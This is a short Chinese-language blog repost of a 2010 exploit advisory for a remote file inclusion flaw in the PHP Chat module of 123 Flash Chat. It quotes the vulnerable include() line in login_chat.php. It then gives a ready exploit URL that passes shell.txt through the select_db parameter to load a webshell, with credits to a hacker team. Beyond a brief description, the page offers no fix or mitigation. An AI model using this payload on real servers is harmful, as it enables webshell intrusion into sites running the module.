123 Flash Chat PHP Chat模块远程文件包含漏洞
发布:wpulog | 发布时间: 2010年7月22日 123 Flash Chat 聊天服务器软件,聊天速度快,使用方便,性价比很高,您不仅可以在自己的网站开设、管理实时的聊天室,还可以将您的聊天室贴到其他论坛、内部或外部门户网站。 PHP Chat是123 Flash Chat的一个第三方模块,PHP Chat的login_chat.php文件存在远程文件包含漏洞,可能导致攻击者直接获取WebShell。
[+]info:
~~~~~~~~~
# Exploit Title: php_chat Remote File inclusion Vulnerability
# Date: 2010/07/20
# Author: HaCkEr arar
# Email: y.0@hotmail.de
# My Sites : www.vbspiders.com
# Script home:
http://www.opensourcescripts.com/dir/PHP/Chat/php_chat_module_for123_flash_chat_4902.html
# Tested on: Windows
# Team hacker:HaCkEr aRaR & ViRuS Qalaa >>>X-MaN HaCk3r TeaM
# ViRuS Qalaa: em9@live.com
[+]poc:
~~~~~~~~~
-=[ vuln c0de ]=-
include('db/'.$select_db.'.php');
login_chat.php
Line:41
----exploit----
http://{localhost}/{path}login_chat.php?select_db=shell.txt?
[+]Reference:
~~~~~~~~~
http://www.exploit-db.com/exploits/14425
发表评论
◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。